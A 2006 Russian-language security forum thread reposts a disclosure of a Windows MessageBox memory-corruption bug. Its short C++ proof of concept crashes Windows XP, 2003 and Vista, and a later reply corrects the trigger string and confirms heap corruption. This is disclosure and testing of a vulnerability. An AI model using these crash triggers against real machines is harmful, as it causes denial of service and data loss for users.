Повреждение памяти в Microsoft Windows

Discussion in 'Безопасность и Анонимность' started by »Atom1c«, 17 Dec 2006.

  1. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Сегодня некий багоискатель wins mallow E-mail: wins-m_(at)_yandex.ru Обнаружил повреждение памяти при выводе на экран сообщения MessageBox с параметром MB_SERVICE_NOTIFICATION, начинающегося на "??"
    Пример:
    char bug [] = "??C:";
    for(int i = 0; i < 10; i ++)
    {
    ::MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION);
    }
    На 2-4 итерации - синий экран или ребут

    Уязвимости подвержены следующие продукты:
    MICROSOFT : Windows XP
    MICROSOFT : Windows 2003 Server
    MICROSOFT : Windows Vista

    Оригинальный текст тут:
    http://security.nnov.ru/source16722.html
     
    #1 »Atom1c«, 17 Dec 2006
  2. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    Занятно) ща проверим
     
    #2 _Great_, 17 Dec 2006
  3. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    Мммм... Xp Sp2 все ок.
     
    #3 _Great_, 17 Dec 2006
  4. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    Ты ошибся - не ??C:, а \\??\\C:\\
    Вот так действительно работает.
    Надо бы покопать

    [​IMG]

    Сайсик подсказывает, что случилось повреждение кучи
     
    #4 _Great_, 17 Dec 2006
    Last edited: 17 Dec 2006
(You must log in or sign up to post here.)